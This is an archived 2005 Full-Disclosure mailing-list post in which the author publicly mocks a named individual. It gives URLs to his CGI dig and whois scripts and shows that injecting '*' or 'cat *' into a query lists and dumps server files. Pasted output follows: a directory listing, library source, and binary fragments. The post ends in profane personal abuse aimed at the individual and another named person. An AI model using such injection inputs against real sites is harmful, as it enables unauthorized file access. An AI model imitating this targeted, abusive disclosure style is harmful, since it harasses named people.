lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu Aug 4 13:14:57 2005 From: joxeankoret at gmail.com (Joxean Koret) Subject: Fernando Gont remote command execution and big mouth vulnerability Oh I see... ppl loves to put ur name in their websites ... HEH!!! u removed the link in the tools (dig) section of: http://www.gont.com.ar nice try .... http://thor.prohosting.com/fgont/cgi-bin/dig.pl http://thor.prohosting.com/fgont/cgi-bin/whois.pl also your dig script have a directory listing bug... just adding * in the query.... dig * ; <<>> DiG 8.3 <<>> cgi-lib.pl cli.pl dig.pl fuente.cgi p1.txt p1dig.txt p1host.txt p1ns.txt p1whois.txt p2.txt p2dig.txt p2h ost.txt p2ns.txt p2whois.txt whois.cgi whois.pl ;; res options: init recurs defnam dnsrch ------ Gont's web site - Tools - whois (p1 of 13) Web Hosting | Free Web Hosting | School Websites | Teacher Websites | VChocolates [banner_sign_up.gif] Chocolates | Toffee | Caramels | Truffles | Search | Heavy Equipment | Fitness | Tools whois whois(1) manual page _______________________________________________________________________________________________________________ whois ________________________________________ _______________________________________________________________________________________________________________ whois cat * # Perl Routines to Manipulate CGI input # cgi-lib@...ox.com # $Id: cgi-lib.pl,v 2.17 1998/05/14 22:39:23 brenner Exp $ # # Copyright (c) 1993-1998 Steven E. Brenner # Unpublished work. # Permission granted to use and modify this library so long as the # copyright above is maintained, modifications are documented, and # credit is given for any use of the library. # # Thanks are due to many people for reporting bugs and suggestions .... Gont's web site Contact Fernando Gont at fernando@...t.com.ar _______________________________________________________________________________________________________________ Gont's web site Contact Fernando Gont at fernando@...t.com.ar _______________________________________________________________________________________________________________ Gont's web site Contact Fernando Gont at fernando@...t.com.ar _______________________________________________________________________________________________________________ Gont's web site Contact Fernando Gont at fernando@...t.com.ar ELF D4?4 (444?@?@...````?`?T?X ????/usr/libexec/ld-elf.so.1FreeBSDS%+ ' )(!& $*%" #???':?D/?T#???,?%1 8??????`? ?Df???RT?Yt?????Yd?t?+????L??W? W]$[h4?libc.so.4warnx__stdoutpconnect_DYNAMICerrxoptargsocketfflushfreeaddrinfo_init_DefaultRuneLocalegai_strerrorenviron ...... "My site does not contan scripts" (since you removed the link). "and is hosted on an OpenBSD server" Then fuck you and theo Regards!!! -------------- next part -------------- A non-text attachment was scrubbed... Name: fgont.jpg Type: image/jpeg Size: 102456 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050804/a77018b3/fgont-0001.jpg
Powered by blists - more mailing lists